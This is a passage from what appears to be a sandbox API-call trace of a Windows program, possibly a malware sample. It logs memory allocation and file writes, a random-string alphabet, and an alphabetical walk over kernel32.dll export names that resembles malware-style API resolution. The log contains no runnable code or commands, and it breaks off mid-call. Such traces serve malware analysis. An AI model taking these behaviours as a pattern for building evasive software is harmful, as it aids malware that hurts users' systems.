dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.767] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.767] CloseHandle (hObject=0x43c) returned 1 [0082.767] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.767] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.768] CloseHandle (hObject=0x0) returned 0 [0082.768] CloseHandle (hObject=0x438) returned 1 [0082.768] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.768] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.768] GetTickCount () returned 0x114d29b [0082.769] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.769] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.769] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.769] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.769] lstrlenA (lpString="kernel32.dll") returned 12 [0082.769] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.770] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.770] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.770] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.770] lstrlenA (lpString="ADDATOMA") returned 8 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.770] lstrlenA (lpString="ADDATOMW") returned 8 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.770] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.770] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.770] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.770] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.770] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.770] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.770] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.770] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.770] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.770] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.770] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.770] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.770] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.771] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.771] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.771] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.771] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.771] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.771] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.771] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.771] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.771] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.771] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.771] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.772] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.772] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.772] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.772] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.772] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.772] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.772] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.772] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.772] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.772] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.772] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.772] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.772] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.772] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.772] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.772] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.772] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.772] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.773] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.773] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.773] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.773] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.773] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.773] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.773] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.773] lstrlenA (lpString="BEEP") returned 4 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.773] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.773] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.773] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.773] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.773] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.773] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.773] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.773] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.773] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.773] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.774] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.774] lstrlenA (lpString="CANCELIO") returned 8 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.774] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.774] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.774] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.774] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.774] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.774] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.774] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.774] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.774] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.774] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.774] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.774] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.774] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.774] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.774] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.774] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.775] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.775] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.775] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.775] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.775] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.775] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.775] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.775] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.775] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.775] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.775] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.775] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.775] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.775] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.775] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.775] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.775] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.775] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.775] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.776] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.776] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.776] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.776] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.776] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.776] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.776] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.776] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.776] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.776] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.776] lstrlenA (lpString="COPYFILEA") returned 9 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.776] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.776] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.776] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, 